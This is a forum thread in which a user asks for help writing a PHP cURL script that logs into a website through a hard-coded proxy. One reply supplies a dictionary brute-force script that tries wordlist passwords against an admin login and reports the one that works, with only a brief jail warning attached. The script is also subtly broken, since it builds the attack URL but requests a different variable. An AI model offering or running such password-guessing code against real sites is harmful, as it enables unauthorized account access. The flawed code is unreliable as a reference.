cURL Auto Login

[Deanznet]

I need some help!

 

I tried my best but still cant get it,

 

The code Below Will Load the page and put the email in the email box.

 

But it wont Put the password in the password box or submit the form..

 

So can anyone shed some light and help fix this code? Thanks!

 

<?php
// INIT CURL
$ch = curl_init();

// SET URL FOR THE POST FORM LOGIN
curl_setopt($ch, CURLOPT_URL, 'http://website.com/login.php');

// ENABLE HTTP POST
curl_setopt ($ch, CURLOPT_POST, 1);

// SET POST PARAMETERS : FORM VALUES FOR EACH FIELD
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);
curl_setopt($ch, CURLOPT_PROXY,"http://64.202.165.130:3128");
curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
curl_setopt ($ch, CURLOPT_POSTFIELDS, 'inputEmailHandle=email@hotmail.com&inputPassword=test123');

// IMITATE CLASSIC BROWSER'S BEHAVIOUR : HANDLE COOKIES
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

# Setting CURLOPT_RETURNTRANSFER variable to 1 will force cURL
# not to print out the results of its query.
# Instead, it will return the results as a string return value
# from curl_exec() instead of the usual true/false.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

$response = curl_exec ($ch);
if(is_int($response)) {
    die("Errors: " . curl_errno($ch) . " : " . curl_error($ch));
}


// CLOSE CURL

curl_close ($ch);

print "Remote Site : $store<br /><hr />$response";

?>

 

 

 

[Deoctor]

Hai

I think ur are trying to do is an auto login.

 

try using the curl in this way

this might work and also u need to mention the variable names that are being used to pass the values in the query.

 

<?php
$url = "http://www.example.com/admin/";         // Set the URL to be bruteforced
$ref = "http://www.example.com/index.php";      // Set the referrer to spoof

$denied = "Forbidden";                          // Set the "Denied" output

$wordlist = "/var/www/wordlist.txt";            // Set the wordlist location

set_time_limit( 0 );                            // Set script execution limit. 0 = no limit


$ch = curl_init( );                             // Initialise cURL
curl_setopt( $ch, CURLOPT_URL,              $url ); // Set URL as $url
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,   1    ); // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION,   1    ); // Set FOLLOWLOCATION to TRUE

foreach( file( $wordlist ) as $password )       // Start the loop for dictionary attack
{
    $force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack,
    curl_setopt( $ch, CURLOPT_URL, $url );      // Load the URL to attack with cURL
    $check = curl_exec( $ch );                  // Set params to check
    if( !eregi( $denied, $check ) )             // Check to see if $denied is not in page
    {
        die( "Success! The password is: {$password}" ); // If $denied returns false, success
    }
}
curl_close( $ch );                              // Close the cURL process
?>

 

forget about the $ref here u can give any valid url of the site. u can use this to check the login with differerent passwords which are mentioned in the wordlist.txt..

use this one at your own server only, do not try using on other machines else if u want to go to jail..

[Deanznet]

Haha okay, But your way wont work..

 

See the site url is this : https://accounts.site.com/login

 

And below is what needs to be posted to

https://accounts.site.com/login in order to login.

 

loginType=L&step=confirmation&Emai=dasd@hotmail.com&inputPassword=test123

 

So any other idea's? Or maybe yours will work but idk im not that smart LOL.

[Deoctor]

i dont know abt this url,coz the site is giving as the server is not found

[cags]

You can use cURL to send post data.

 

$params = "loginType=L&step=confirmation&Emai=dasd@hotmail.com&inputPassword=test123";
curl_setopt($ch, CURLOPT_POST, 1); // set POST to true
curl_setopt($ch, CURLOPT_POSTFIELDS, $params); // the data to be POST'ed